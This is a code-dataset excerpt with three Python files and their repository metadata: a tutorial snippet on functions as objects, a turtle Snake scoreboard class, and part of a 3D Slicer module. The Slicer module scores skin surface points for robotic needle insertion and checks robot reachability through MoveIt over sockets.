# "except NameError, e"); both forms below are valid on Python 2.6+ and 3.x.
def shout(word="yes"):
    """Return *word* capitalized with a trailing exclamation mark."""
    return word.capitalize() + "!"

print(shout())
# outputs : 'Yes!'

# As an object, you can assign the function to a variable like any
# other object
scream = shout

# Notice we don't use parentheses: we are not calling the function, we are
# putting the function "shout" into the variable "scream".
# It means you can then call "shout" from "scream":
print(scream())
# outputs : 'Yes!'

# More than that, it means you can remove the old name 'shout', and
# the function will still be accessible from 'scream'
del shout
try:
    print(shout())
except NameError as e:
    print(e)
    # outputs: "name 'shout' is not defined"

print(scream())
# outputs: 'Yes!'
|
[
"a.zacniewski@gmail.com"
] |
a.zacniewski@gmail.com
|
947921228a07d1818a52f9c16c3e1ce5adc60daa
|
1fe1ee2f53c004f804e9fe69e6615d3897b63615
|
/Snake/scoreboard.py
|
09ce5b4d4a78cabf6605f7dc4adb6329f392d0ca
|
[] |
no_license
|
jguillermo19/Python_Codigos
|
396083da6d807a5af6170b6b7e52537ab530754a
|
b48ebfacacab79c9390a9119992d76ebb10ffbc1
|
refs/heads/main
| 2023-08-18T23:23:45.932209
| 2021-09-15T20:47:44
| 2021-09-15T20:47:44
| 402,956,446
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 798
|
py
|
from turtle import Turtle, update
# Text-layout constants shared by every Scoreboard write() call.
ALIGNMENT = "center"  # horizontal alignment argument for turtle.write()
FONT = ("Courier",15,"normal")  # (family, size, style) tuple for turtle.write()
class Scoreboard(Turtle):
    """Turtle-based HUD that displays the current score for the snake game."""

    def __init__(self):
        super().__init__()
        self.score = 0
        self.color("white")
        self.penup()           # lift the pen so repositioning draws no line
        self.goto(0,270)       # park the writer at the top of the screen
        self.hideturtle()      # keep the turtle cursor itself invisible
        self.update_scoreboard()

    def update_scoreboard(self):
        """Redraw the score text at the scoreboard's current position."""
        label = f"Score {self.score}"
        self.write(label,align=ALIGNMENT,font=FONT)

    def game_over(self):
        """Write the game-over banner in the middle of the screen."""
        self.goto(0,0)
        self.write("GAME OVER",align=ALIGNMENT,font=FONT)

    def increase_score(self):
        """Bump the score by one and refresh the on-screen text."""
        self.score += 1
        self.clear()
        self.update_scoreboard()
|
[
"jsandovalh1500@alumno.ipn.mx"
] |
jsandovalh1500@alumno.ipn.mx
|
2d8682112e73378bda15b48f3f96e82f212dda8b
|
96e2c852ce0ba975affacc90e31037dd3982ed4b
|
/BestPathVisualization/BestPathVisualizationLib/logic.py
|
0480871de29e0fdeecaad1423d664039cdf113d8
|
[] |
no_license
|
StefanTUHH/robotic_needle_insertion
|
9d5c3883f36ce325952e08b130bc355028ad1578
|
0b54ebcf97a0946ec3ba99cfbaef1d471482c9d5
|
refs/heads/master
| 2023-07-10T12:04:53.801630
| 2021-09-01T07:08:34
| 2021-09-01T07:08:34
| 400,170,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,514
|
py
|
import sys
from itertools import compress
from typing import Optional
from numpy import linalg
import time
from multiprocessing import Process, cpu_count, Queue
from . import overlay
from .slicer_convenience_lib import *
try:
import sklearn
from scipy.spatial import ConvexHull
except ImportError:
slicer.util.pip_install("scipy==1.5.2")
slicer.util.pip_install("sklearn")
import sklearn
from scipy.spatial import ConvexHull
try:
import pyvista as pv
except ImportError:
slicer.util.pip_install("pyvista")
import pyvista as pv
# BestPathVisualizationLogic
#
class BestPathVisualizationLogic(ScriptedLoadableModuleLogic):
    """This class should implement all the actual
    computation done by your module. The interface
    should be such that other python code can import
    this class and make use of the functionality without
    requiring an instance of the Widget.
    Uses ScriptedLoadableModuleLogic base class, available at:
    https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
    """

    # Timing accumulators (seconds) for the pipeline stages:
    # T0 skin segmentation, T1 density overlay, T2 distance weighting,
    # T3 angle weighting, T4 MoveIt reachability check.
    T0, T1, T2, T3, T4 = 0, 0, 0, 0, 0

    def __init__(self, maxDistance, imageThreshold, colorbarValue, discreetStepsValue, socketReceiveSend, matrix):
        # NOTE(review): super().__init__() is not called here — confirm the
        # ScriptedLoadableModuleLogic base class needs no initialization.
        # Slicer node handles, filled in lazily.
        self.segmentEditorNode = None
        self.segmentationNode = None
        # Progress/cancellation hooks set by the widget.
        self.updateCallback = None
        self.doneCallback = None
        self.cancel = False
        # Optional path prefix for result files (see writeOutput).
        self.outputPath = None
        self.useHoleFilling = False
        # Maximum allowed surface-to-target distance (mm, presumably — TODO confirm units).
        self.maxDistance = maxDistance
        # Lower HU threshold used when segmenting the skin surface.
        self.imageThreshold = imageThreshold
        self.initTransform = True
        # Sockets to the MoveIt bridge processes; None disables reachability checks.
        self.socketReceiveSend = socketReceiveSend
        # vtkMatrix4x4 transform from scene/RAS into the robot base frame.
        self.matrix = matrix
        # Scalar value above which surface points are considered infeasible in the colormap.
        self.colorbarValue = colorbarValue
        # Grid size used to discretize candidate points before sending to MoveIt.
        self.discreetStepsValue = discreetStepsValue
        self.arrShape = None
        # Selects which density metric overlay.calcDensity computes (7 = combined).
        self.overlayTypeIndex = 0
        self.maxKernelSize = 0
        # Weights for the combined distance/angle score; set by the widget.
        self.distanceWeighting = None
        self.angleWeighting = None
        # Fixed pose of the gantry collision box in the robot base frame (homogeneous 4x4).
        self.gantry_pose = np.asarray(
            ((1., 0., 0., -1000.,), (0., 1., 0., -1000.,), (0., 0., 1., 1390.,), (0., 0., 0., 1.,)))
        # Per-vertex scalar overlays (vtkFloatArray), filled by addOverlay/applyReachability.
        self.scalarData = None
        self.scalarDataMoveIt = None
        # Target fiducial in world (RAS) coordinates and in CT voxel indices.
        self.targetGlobal = [0, 0, 0]
        self.targetPoint = [0, 0, 0]

    def runSegment(self, inputVolume, outputModel, targetNode):
        """
        Run the actual algorithm: segment the skin (if needed), compute the
        density/distance/angle overlay, optionally check reachability via
        MoveIt, write results to disk and display them.  Returns False when
        inputs are invalid or the user cancelled, True on completion.
        """
        if not self.isValidInputOutputData(inputVolume, outputModel, targetNode):
            return False
        logging.info('Processing started')
        npArrPoly = arrayFromModelPoints(outputModel)
        if len(npArrPoly) == 0:
            # No surface yet: segment the skin from the input volume and time it.
            start_A = time.time()
            self.segmentSkin(inputVolume, outputModel)
            end_A = time.time()
            self.T0 = end_A - start_A
            npArrPoly = arrayFromModelPoints(outputModel)
        else:
            logging.info("Using previously segmented skin model")
            self.initWithPreviousModel(inputVolume, outputModel)
        ret = self.addOverlay(outputModel, targetNode)
        if ret is None:
            # addOverlay returns None on cancellation.
            return False
        indices, insideTransformed = ret
        # Only smooth (max-kernel) the points whose density is still feasible.
        relevantPoints = np.asarray(self.scalarData)[indices] < self.globalMaxDensity
        if len(relevantPoints) > 0 and not self.applyMaxKernel(np.asarray(indices)[relevantPoints],
                                                               insideTransformed[relevantPoints, :]):
            return False
        # Row 0 holds the target point; remaining rows are (x, y, z, density).
        # NOTE(review): np.float is a deprecated alias (removed in NumPy 1.24) — use float.
        combinedArray = np.zeros((len(npArrPoly) + 1, 4), dtype=np.float)
        combinedArray[0, :3] = self.targetGlobal
        combinedArray[1:, :3] = npArrPoly
        combinedArray[1:, 3] = self.scalarData
        combinedArrayMoveIt, foundInfeasiblePosition = self.applyReachability(combinedArray, npArrPoly)
        self.writeOutput(targetNode, combinedArray, combinedArrayMoveIt)
        self.displayResults(combinedArrayMoveIt is not None, npArrPoly, outputModel, foundInfeasiblePosition)
        logging.info('Processing completed')
        if self.waypoint(100):
            return False
        return True

    @staticmethod
    def np_matrix_from_vtk(vtk_matrix):
        """Convert a vtkMatrix4x4 into a 4x4 numpy array."""
        result = np.eye(4)
        for r in range(4):
            for c in range(4):
                result[r, c] = vtk_matrix.GetElement(r, c)
        return result

    def applyReachability(self, combinedArray, npArrPoly):
        """Check candidate surface points against MoveIt (if sockets exist) and
        build scalarDataMoveIt; returns (moveit_array_or_None, infeasible_found)."""
        # Check if Points are reachable by MoveIt
        combinedArrayMoveItIn = np.delete(combinedArray, 0, 0)
        combinedArrayMoveIt = None
        foundInfeasiblePosition = False
        if self.socketReceiveSend is not None:
            if self.waypoint(95, "Checking Map with MoveIt"):
                # NOTE(review): runSegment unpacks this return value into two
                # variables — returning bare False here would raise TypeError
                # on cancellation.  Verify the intended cancel path.
                return False
            tf_matrix = self.np_matrix_from_vtk(self.matrix)
            self.applyGantryMesh(tf_matrix)
            self.applyCollisionMesh(npArrPoly)
            start_E = time.time()
            combinedArrayMoveIt = self.checkMoveIt(combinedArrayMoveItIn)
            end_E = time.time()
            self.T4 = end_E - start_E
            moveItBool = combinedArrayMoveIt[:, 4]
            # Create VTK Color Map
            self.scalarDataMoveIt = vtk.vtkFloatArray()
            self.scalarDataMoveIt.SetNumberOfComponents(0)
            self.scalarDataMoveIt.SetNumberOfValues(len(npArrPoly))
            self.scalarDataMoveIt.SetName("density")
            # Extra color-table slot used to mark unreachable points.
            toAdd = int(np.ceil((self.colorbarValue - self.globalMinDensity) / 256))
            not_reachable = moveItBool == 1
            np.asarray(self.scalarDataMoveIt)[~not_reachable] = combinedArray[
                np.add(np.where(~not_reachable), 1), 3].flatten()
            if np.any(not_reachable):
                foundInfeasiblePosition = True
                np.asarray(self.scalarDataMoveIt)[not_reachable] = self.globalMaxDensity + toAdd
            logging.info("Finished with MoveIT")
        return combinedArrayMoveIt, foundInfeasiblePosition

    def writeOutput(self, targetNode, combinedArray, combinedArrayMoveIt: Optional = None):
        """Write the colormap (and optionally the MoveIt colormap and timing data)
        to text files next to self.outputPath."""
        # NOTE(review): "is not ''" compares identity, not equality — relies on
        # string interning and emits SyntaxWarning on Python 3.8+; should be != ''.
        if self.outputPath is not None and self.outputPath is not '':
            string_path = self.outputPath.split('.')
            targetName = targetNode.GetName()
            outputPath_ColormapMoveIt = string_path[0] + targetName + '_Rob.txt'
            outputPath_Colormap = string_path[0] + targetName + '.txt'
            outputPath_ComputationTime = string_path[0] + targetName + '_ComputationTime.txt'
            # Timing data is only dumped when the path contains "time".
            timeEstimation = "time" in outputPath_Colormap
            logging.info("Saving result to file {}".format(outputPath_Colormap))
            with open(outputPath_Colormap, "w") as f:
                np.savetxt(f, combinedArray)
            if timeEstimation:
                logging.info("Saving Computation Time.")
                with open(outputPath_ComputationTime, "w") as f:
                    np.savetxt(f, [self.T0, self.T1, self.T2, self.T3, self.T4])
            if combinedArrayMoveIt is not None:
                logging.info("Saving moveit result to file {}".format(outputPath_ColormapMoveIt))
                with open(outputPath_ColormapMoveIt, "w") as f:
                    np.savetxt(f, combinedArrayMoveIt)

    def displayResults(self, couldConnectToMoveIt, npArrPoly, outputModel, foundInfeasiblePosition):
        """Mark the optimal surface point with a fiducial and color the output
        model by the (MoveIt-aware, if available) density overlay."""
        # Best point = minimum of whichever scalar field is authoritative.
        if couldConnectToMoveIt:
            min_point = npArrPoly[np.argmin(self.scalarDataMoveIt), :]
        else:
            min_point = npArrPoly[np.argmin(self.scalarData), :]
        fixedLRS = slicer.vtkMRMLMarkupsFiducialNode()
        fixedLRS.SetName('Opt_Surface')
        fixedLRS.AddFiducial(min_point[0], min_point[1], min_point[2])
        slicer.mrmlScene.AddNode(fixedLRS)
        fixedLRS.SetDisplayVisibility(True)
        outputModel.CreateDefaultDisplayNodes()
        print("Showing resulting model")
        if couldConnectToMoveIt:
            outputModel.GetPolyData().GetPointData().AddArray(self.scalarDataMoveIt)
        else:
            outputModel.GetPolyData().GetPointData().AddArray(self.scalarData)
        arrayFromModelPointDataModified(outputModel, "density")
        arrayFromModelPointsModified(outputModel)
        # Show pretty results
        modelDisplayNode = outputModel.GetDisplayNode()
        modelDisplayNode.SetActiveScalarName("density")
        modelDisplayNode.SetScalarRangeFlag(1)
        scalarRange = modelDisplayNode.GetScalarRange()
        # Fixes issue when no point is reachable
        scalarRange = (min(self.colorbarValue - 1, min(scalarRange[0], np.min(self.scalarData))),
                       max(scalarRange[1], np.max(self.scalarData)))
        # Extend the 256-entry color table so values above colorbarValue get
        # dedicated "infeasible" colors.
        newColorSize = int(
            round((scalarRange[1] - self.colorbarValue) / (self.colorbarValue - scalarRange[0]) * 256 + 256))
        densityColor = slicer.mrmlScene.AddNode(slicer.modules.colors.logic().CopyNode(
            slicer.mrmlScene.GetNodeByID("vtkMRMLColorTableNodeFileColdToHotRainbow.txt"), "densityColor"))
        densityColor.SetNumberOfColors(int(newColorSize))
        offset = 10
        # Dark red: above the feasibility threshold.
        for i in range(256, newColorSize - offset):
            densityColor.SetColor(i, 0.453125, 0, 0)
        # Skin tone: near the very top of the range.
        for i in range(newColorSize - offset, newColorSize - 1):
            densityColor.SetColor(i, 0.875, 0.671875, 0.41015625)
        if couldConnectToMoveIt and foundInfeasiblePosition:
            # Grey marks "not reachable by the robot".
            densityColor.SetColor(newColorSize - 1, 0.35, 0.35, 0.35)
        else:
            densityColor.SetColor(newColorSize - 1, 0.875, 0.671875, 0.41015625)
        modelDisplayNode.SetAndObserveColorNodeID(densityColor.GetID())
        print("Displaying...")
        modelDisplayNode.SetScalarVisibility(True)
        modelDisplayNode.SetScalarRangeFlag(0)
        modelDisplayNode.SetScalarRange((scalarRange[0], scalarRange[1]))

    def addOverlay(self, outputModel, targetNode):
        """Compute the per-vertex scalar overlay (density / distance / angle,
        combined per the weighting settings).  Returns (indices,
        insideTransformed) for points within range, or None on cancellation."""
        targetNode.GetMarkupPoint(0, 0, self.targetGlobal)
        self.targetPoint = self.transformToCT(self.targetGlobal)
        logging.info("Surface point in CT indices: {}".format(self.targetPoint))
        npArrPoly = arrayFromModelPoints(outputModel)
        if self.waypoint(25, "Adding scalar overlay"):
            return None
        self.scalarData = vtk.vtkFloatArray()
        self.scalarData.SetNumberOfComponents(0)
        self.scalarData.SetNumberOfValues(len(npArrPoly))
        self.scalarData.SetName("density")
        # Calc density for all relevant surface points
        point_VolumeRas = vtk.vtkPoints()
        transformed = self.transformPointsToCT(outputModel.GetPolyData().GetPoints(), point_VolumeRas)
        distances = np.linalg.norm(npArrPoly - self.targetGlobal, axis=1)
        # A point is "outside" if too far from the target, outside the CT
        # volume, or within 50 units of the model's minimum y (table side —
        # presumably to exclude the posterior surface; TODO confirm).
        pointOutside = np.add(np.add(distances > self.maxDistance, ~self.pointInVolume(transformed, self.arrShape)),
                              npArrPoly[:, 1] < 50 + np.min(npArrPoly[:, 1]))
        pointInside = ~pointOutside
        np.asarray(self.scalarData)[pointOutside] = self.globalMaxDensity
        indices = list(compress(range(len(pointInside)), pointInside))
        insideTransformed = np.asarray(list(compress(transformed, pointInside)))
        self.maxIdx = len(indices) - 1
        logging.info(self.maxIdx)
        with np.errstate(divide='ignore', invalid='ignore'):
            if self.overlayTypeIndex == 7:
                # Combined overlay: density pass, then optional distance- and
                # angle-weighted passes, accumulated into combinedData.
                start_B = time.time()
                self.overlayTypeIndex = 0
                if not calcDensityInThread(self, indices, insideTransformed):
                    return None
                if self.waypoint(40):
                    return None
                combinedData = np.copy(self.scalarData)
                relevant_indices = np.logical_and(combinedData < self.colorbarValue, pointInside)
                end_B = time.time()
                self.T1 = end_B - start_B
                if self.distanceWeighting > 0:
                    self.overlayTypeIndex = 4  # Distance
                    start_C = time.time()
                    if not calcDensityInThread(self, indices, insideTransformed):
                        return None
                    if self.waypoint(60):
                        return None
                    maxDistance = self.maxDistance
                    # Normalize distances onto the colorbar scale.
                    np.asarray(self.scalarData)[relevant_indices] = np.asarray(self.scalarData)[
                        relevant_indices] / maxDistance * self.colorbarValue
                    combinedData[relevant_indices] = self.distanceWeighting * np.asarray(self.scalarData)[
                        relevant_indices]
                    end_C = time.time()
                    self.T2 = end_C - start_C
                else:
                    combinedData[relevant_indices] = 0
                if self.angleWeighting > 0:
                    start_D = time.time()
                    self.overlayTypeIndex = 5  # Angle
                    if not calcDensityInThread(self, indices, insideTransformed):
                        return None
                    # Normalize angles (max pi/2) onto the colorbar scale.
                    maxAngle = np.pi / 2
                    np.asarray(self.scalarData)[relevant_indices] = np.asarray(self.scalarData)[
                        relevant_indices] / maxAngle * self.colorbarValue
                    combinedData[relevant_indices] = combinedData[relevant_indices] + self.angleWeighting * \
                        np.asarray(self.scalarData)[relevant_indices]
                    end_D = time.time()
                    self.T3 = end_D - start_D
                np.asarray(self.scalarData)[:] = combinedData
                self.overlayTypeIndex = 7
            else:
                # Single-metric overlay as selected by overlayTypeIndex.
                if not calcDensityInThread(self, indices, insideTransformed):
                    return None
        return indices, insideTransformed

    def initWithPreviousModel(self, inputVolume, outputModel):
        """Re-initialize transforms and cached volume data for an already
        segmented skin model, and drop any stale density overlay."""
        if self.arrShape is None:
            self.transformRasToVolumeRas = vtk.vtkGeneralTransform()
            slicer.vtkMRMLTransformNode.GetTransformBetweenNodes(None, inputVolume.GetParentTransformNode(),
                                                                 self.transformRasToVolumeRas)
            # Get voxel coordinates from physical coordinates
            volumeRasToIjk = vtk.vtkMatrix4x4()
            inputVolume.GetRASToIJKMatrix(volumeRasToIjk)
            self.volumeRasToIjk = vtk.vtkTransform()
            self.volumeRasToIjk.SetMatrix(volumeRasToIjk)
            self.inputVolumeNPArray = np.asarray(slicer.util.arrayFromVolume(inputVolume))
            # +10 guarantees the sentinel exceeds every real voxel value.
            self.globalMaxDensity = np.max(self.inputVolumeNPArray) + 10
            self.globalMinDensity = np.min(self.inputVolumeNPArray)
            self.arrShape = np.asarray(np.shape(self.inputVolumeNPArray))
            self.spacing = inputVolume.GetSpacing()
            logging.info("Shape: " + str(self.arrShape))
            self.result = np.zeros(self.arrShape) + self.globalMaxDensity
        outputModel.GetPolyData().GetPointData().RemoveArray("density")

    def segmentSkin(self, inputVolume, outputModel):
        """Segment the skin surface from the input volume via thresholding,
        island selection, optional hole filling and invert passes, and store
        the closed-surface representation in outputModel."""
        # If volume node is transformed, apply that transform to get volume's RAS coordinates
        self.transformRasToVolumeRas = vtk.vtkGeneralTransform()
        slicer.vtkMRMLTransformNode.GetTransformBetweenNodes(None, inputVolume.GetParentTransformNode(),
                                                             self.transformRasToVolumeRas)
        # Get voxel coordinates from physical coordinates
        volumeRasToIjk = vtk.vtkMatrix4x4()
        inputVolume.GetRASToIJKMatrix(volumeRasToIjk)
        self.spacing = inputVolume.GetSpacing()
        self.volumeRasToIjk = vtk.vtkTransform()
        self.volumeRasToIjk.SetMatrix(volumeRasToIjk)
        self.inputVolumeNPArray = np.asarray(slicer.util.arrayFromVolume(inputVolume))
        # +10 guarantees the sentinel exceeds every real voxel value.
        self.globalMaxDensity = np.max(self.inputVolumeNPArray) + 10
        self.globalMinDensity = np.min(self.inputVolumeNPArray)
        self.arrShape = np.asarray(np.shape(self.inputVolumeNPArray))
        logging.info("Shape: " + str(self.arrShape))
        self.result = np.zeros(self.arrShape) + self.globalMaxDensity
        if self.waypoint(5, "Creating segmentation"):
            return False
        # Create segmentation
        if self.segmentationNode is not None:
            slicer.mrmlScene.RemoveNode(self.segmentationNode)
        addedSegmentID, segmentEditorWidget, segmentEditorNode = self.initSegmentationNode(inputVolume)
        self.applyThresholding(segmentEditorWidget, inputVolume)
        if self.waypoint(10, "Selecting largest island"):
            return False
        self.applyLargestIsland(segmentEditorWidget)
        if self.useHoleFilling:
            if self.waypoint(12, "Filling holes"):
                return False
            self.applySmoothing(segmentEditorWidget)
        if self.waypoint(18, "Inverting"):
            return False
        # Invert / keep-largest / invert removes interior cavities, leaving a
        # solid body whose surface is the skin.
        self.applyInverting(segmentEditorWidget)
        if self.waypoint(19, "Selecting largest island"):
            return False
        # Selecting largest island
        self.applyLargestIsland(segmentEditorWidget)
        if self.waypoint(20, "Inverting"):
            return False
        self.applyInverting(segmentEditorWidget)
        # Cleanup
        segmentEditorWidget.setActiveEffectByName(None)
        slicer.mrmlScene.RemoveNode(segmentEditorNode)
        if self.waypoint(21, "Creating closed surface"):
            return False
        outputPolyData = vtk.vtkPolyData()
        slicer.vtkSlicerSegmentationsModuleLogic.GetSegmentClosedSurfaceRepresentation(self.segmentationNode,
                                                                                       addedSegmentID, outputPolyData)
        outputModel.SetAndObservePolyData(outputPolyData)
        self.segmentationNode.GetDisplayNode().SetVisibility(False)

    def checkMoveIt(self, modelPoints):
        """Send discretized feasible candidate points to MoveIt and annotate
        each model point with a reachability code in column 4."""
        # Split Array
        positions = modelPoints[:, :3]
        color = modelPoints[:, 3]
        # Only eval Points which have a feasible color
        relevantColor = color < self.globalMaxDensity
        positions_color = positions[relevantColor, :]
        # Round Positions
        positions_color_r = np.ceil(positions_color / self.discreetStepsValue) * self.discreetStepsValue
        # Find unique Positions
        positions_color_r_unique = np.unique(positions_color_r, axis=0)
        # First row of the payload is the (transformed) target point.
        transformedPoints = self.transformToBase(
            np.append(np.expand_dims(self.targetGlobal, axis=0), positions_color_r_unique, axis=0))
        sendArray = np.append(np.array([len(positions_color_r_unique)]), transformedPoints.flatten())
        target_transformed = transformedPoints[0, :3]
        self.waypoint(96, 'Starting Checking Points with MoveIt')
        # print(sendArray)
        print('Points to evaluate:' + str(len(positions_color_r_unique)))
        # Convert to Float
        moveIt_result = self.sendInPeices(positions_color_r_unique, sendArray, target_transformed)
        # print("moveIt_result_boolean", moveIt_result)
        moveIt_result_idx = np.ones(len(moveIt_result))
        if np.any(np.asarray(moveIt_result)):
            moveIt_result_idx[np.asarray(moveIt_result)] = 2
        # 0 --> not in map, 1--> in colormap but not reachabel, 2--> in colormap and reachable
        self.waypoint(99, 'Finished Checking Points with MoveIt')
        # Update Color List
        # Map each unique discretized point's verdict back to all original
        # points that rounded to it.
        color_array_moveIT = np.zeros(len(positions_color_r))
        for count, p in enumerate(positions_color_r_unique):
            color_array_moveIT[np.all(positions_color_r == p, axis=1)] = moveIt_result_idx[count]
        # NOTE(review): np.float is a deprecated alias (removed in NumPy 1.24).
        modelPointsOut = np.zeros((len(positions), 5), dtype=np.float)
        modelPointsOut[:, :3] = positions
        modelPointsOut[:, 3] = color
        modelPointsOut[relevantColor, 4] = color_array_moveIT
        return modelPointsOut

    def sendInPeices(self, positions_color_r_unique, sendArray, target_transformed):
        """Split the candidate-point payload across the simulation sockets,
        send each slice, then collect the boolean reachability answers."""
        sent = 0
        # Socket 0 is reserved (presumably for the real robot — TODO confirm);
        # the remaining sockets run the reachability simulations.
        socketsForSimulation = self.socketReceiveSend if len(self.socketReceiveSend) <= 1 else self.socketReceiveSend[1:]
        per_package = int(np.ceil(len(positions_color_r_unique) / len(socketsForSimulation)))
        for s in socketsForSimulation:
            if len(positions_color_r_unique) <= sent:
                break
            up_idx = min(sent + per_package, len(positions_color_r_unique))
            # Payload: [count, target_xyz, slice of flattened candidate xyz...].
            to_send = np.append(np.asarray((up_idx - sent)), target_transformed[:3])
            to_send = np.append(to_send, sendArray[(4 + sent * 3):(up_idx * 3 + 4)])
            sent = up_idx
            s.send(str(to_send.tolist()).encode())
        # Receive Answer
        moveIt_result = []
        sent = 0
        for s in socketsForSimulation:
            if len(positions_color_r_unique) <= sent:
                break
            up_idx = min(sent + per_package, len(positions_color_r_unique))
            sent = up_idx
            # Reply is a string of '0'/'1' characters, one per point.
            recv_data = s.recv(102400)
            msg = list(recv_data.decode('utf-8'))
            moveIt_result += [bool(int(i)) for i in msg]
        return moveIt_result

    def applyMaxKernel(self, indices, pointsTransformed):
        """Replace each feasible point's scalar with the maximum over its
        neighbourhood of radius maxKernelSize (a conservative smoothing).
        Returns False only on user cancellation."""
        if self.maxKernelSize == 0:
            return True
        self.waypoint(75., "Applying max kernel")
        from sklearn.neighbors import radius_neighbors_graph
        values = np.copy(self.scalarData)
        values = values[indices]
        # Sparse adjacency of points within maxKernelSize (physical units,
        # since voxel coords are scaled by spacing).
        neighbours = radius_neighbors_graph(pointsTransformed * self.spacing, radius=self.maxKernelSize, n_jobs=-1,
                                            include_self=True)
        executeInPeices(lambda q, idx, sent: self.applyMaxKernelImpl(q, idx, neighbours, values, sent), indices, np.asarray(self.scalarData))
        if self.waypoint(95.):
            return False
        return True

    @staticmethod
    def applyMaxKernelImpl(q: Queue, indices, neighbours, values, idxOffset):
        """Worker: for each index, take the max scalar over its neighbour set
        and push the resulting array onto the queue."""
        result = np.zeros((len(indices)))
        for neighbourIdx, idx in enumerate(indices):
            # NOTE(review): np.bool is a deprecated alias (removed in NumPy 1.24).
            finalIdx = np.asarray(neighbours.getrow(neighbourIdx + idxOffset).toarray(), dtype=np.bool).flatten()
            result[neighbourIdx] = np.max(values[finalIdx])
        q.put(result)

    def pointInVolume(self, point, maxDim):
        """Vectorized test whether each voxel-index row lies strictly inside
        the volume bounds."""
        return np.logical_and(np.all(point > 0, axis=1), np.all(point < maxDim - 1, axis=1))

    def transformToCT(self, point):
        """Transform a single RAS point into (k, j, i) CT voxel indices."""
        point_VolumeRas = self.transformRasToVolumeRas.TransformPoint(point[0:3])
        point_Ijk = self.volumeRasToIjk.TransformPoint(point_VolumeRas)
        # Flip to match numpy array axis order (z, y, x).
        return np.asarray(np.flip(point_Ijk[0:3], 0), dtype=np.int)

    def transformPointsToCT(self, points, point_VolumeRas):
        """Transform a vtkPoints set into CT voxel indices (axes flipped to
        numpy order); point_VolumeRas is used as the output buffer."""
        tmp = vtk.vtkPoints()
        self.transformRasToVolumeRas.TransformPoints(points, tmp)
        self.volumeRasToIjk.TransformPoints(tmp, point_VolumeRas)
        return np.asarray(np.flip(vtk.util.numpy_support.vtk_to_numpy(point_VolumeRas.GetData())[:, 0:3], 1),
                          dtype=np.int)

    def applyGantryMesh(self, tf_matrix: np.ndarray):
        """Send the fixed gantry plane (two triangles) to every MoveIt socket
        as a collision mesh and wait for acknowledgement."""
        IJK_T_RAS = np.eye(4)
        transformed_pose = tf_matrix.dot(IJK_T_RAS).dot(self.gantry_pose)
        size = 3000.
        points = np.asarray(((0., 0., 0., 1.), (0., size, 0., 1.), (size, 0., 0., 1.), (size, 0., 0., 1.),
                             (0., size, 0., 1.), (size, size, 0., 1.))).T
        points = transformed_pose.dot(points)[:3, :]
        # Center the mesh; the protocol sends center + centered vertices.
        max_v = np.max(points, axis=1)
        min_v = np.min(points, axis=1)
        center = (max_v - min_v) / 2 + min_v
        points = np.subtract(points.T, center)
        # Header (-2., 1.) presumably tags this message as "gantry mesh" — TODO confirm protocol.
        sendArray = np.append(np.append(np.asarray((-2., 1.)), center), points.flatten())
        for s in self.socketReceiveSend:
            s.send(str(sendArray.tolist()).encode())
        # Wait for bb to be applied
        for s in self.socketReceiveSend:
            s.recv(102400)

    def transformPoints(self, points, matrix):
        """Apply a 4x4 homogeneous transform to an (N, 3) point array."""
        transformed = matrix.dot(np.append(points, np.ones((np.shape(points)[0], 1)), axis=1).T)
        return transformed[:3, :].T

    def transformToBase(self, points):
        """Transform RAS points into the robot base frame (self.matrix with an
        RAS->LPS axis flip applied first)."""
        tf_mat = self.np_matrix_from_vtk(self.matrix)
        IJK_T_RAS = np.eye(4)
        IJK_T_RAS[0, 0] = -1
        IJK_T_RAS[1, 1] = -1
        tf_mat = tf_mat.dot(IJK_T_RAS)
        return self.transformPoints(points, tf_mat)

    def applyCollisionMesh(self, points: np.ndarray):
        """Build a patient collision mesh (alpha-shape of subsampled surface
        points plus a table box below it) and send it to every MoveIt socket."""
        resolution = 30.
        # Round Positions
        positions_to_eval_subsampled = np.round(points / resolution) * resolution
        # Find unique Positions
        unique_points_eval = np.unique(positions_to_eval_subsampled, axis=0)
        if len(unique_points_eval) == 0:
            return
        points_arr = self.transformToBase(unique_points_eval)
        cloud = pv.PolyData(points_arr[:, :3])
        # cloud.plot()
        # Alpha slightly above the grid resolution keeps the hull watertight.
        volume = cloud.delaunay_3d(alpha=resolution * 1.2)
        shell = volume.extract_geometry()
        # shell.plot()
        # Hull
        # hull = ConvexHull(points_arr[:, :3])
        # pyvista faces come as [3, i, j, k, 3, ...]; drop the leading counts.
        indices = shell.faces.reshape((-1, 4))[:, 1:]
        vertices = points_arr[indices]
        # add table
        max_v = np.max(np.max(vertices, axis=0), axis=0)
        min_v = np.min(np.min(vertices, axis=0), axis=0)
        table_slack = 30.
        depth = 500.
        min_v[2] += table_slack
        min_v[:2] -= table_slack
        max_v[:2] += table_slack
        # Box of 12 triangles (2 per face minus the open top) under the patient.
        table = np.asarray(
            (((min_v[0], min_v[1], min_v[2]), (min_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2])),
             ((min_v[0], min_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2])),
             ((min_v[0], min_v[1], min_v[2] - depth), (min_v[0], max_v[1], min_v[2] - depth),
              (max_v[0], max_v[1], min_v[2] - depth)),
             ((min_v[0], min_v[1], min_v[2] - depth), (max_v[0], max_v[1], min_v[2] - depth),
              (max_v[0], min_v[1], min_v[2] - depth)),
             ((min_v[0], min_v[1], min_v[2]), (min_v[0], max_v[1], min_v[2]), (min_v[0], max_v[1], min_v[2] - depth)),
             ((min_v[0], max_v[1], min_v[2] - depth), (min_v[0], min_v[1], min_v[2] - depth),
              (min_v[0], min_v[1], min_v[2])),
             ((max_v[0], min_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2] - depth)),
             ((max_v[0], max_v[1], min_v[2] - depth), (max_v[0], min_v[1], min_v[2] - depth),
              (max_v[0], min_v[1], min_v[2])),
             ((min_v[0], min_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2] - depth)),
             ((min_v[0], min_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2] - depth),
              (min_v[0], min_v[1], min_v[2] - depth)),
             ((min_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2] - depth)),
             ((min_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2] - depth),
